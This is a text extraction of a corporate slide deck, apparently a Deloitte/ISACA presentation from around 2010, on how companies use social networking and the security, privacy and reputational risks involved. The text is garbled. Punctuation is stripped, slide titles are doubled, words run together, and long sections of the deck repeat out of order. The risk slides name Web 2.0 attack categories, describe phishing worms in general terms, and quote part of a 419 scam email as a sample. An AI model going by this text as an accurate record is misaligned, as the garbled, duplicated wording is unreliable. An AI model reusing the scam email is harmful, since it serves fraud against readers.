bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg4
Social network Social network mdashmdash Some definitionsSome definitions
bull As defined in Wikipediandash A social network is a social structure made
of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency such as values visions ideas financial exchange friendship kinship dislike conflict or trade The resulting structures are often very complex
bull As defined in Webmasterndash Social networking is a phenomena defined by linking people to each
other in some way Digg is a popular example of a social network (using social bookmarking) Users work together to rate news and are linked by rating choices or explicit identification of other members Generally social networks are used to allow or encourage various types of activity whether commercial social or some combination of the two
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
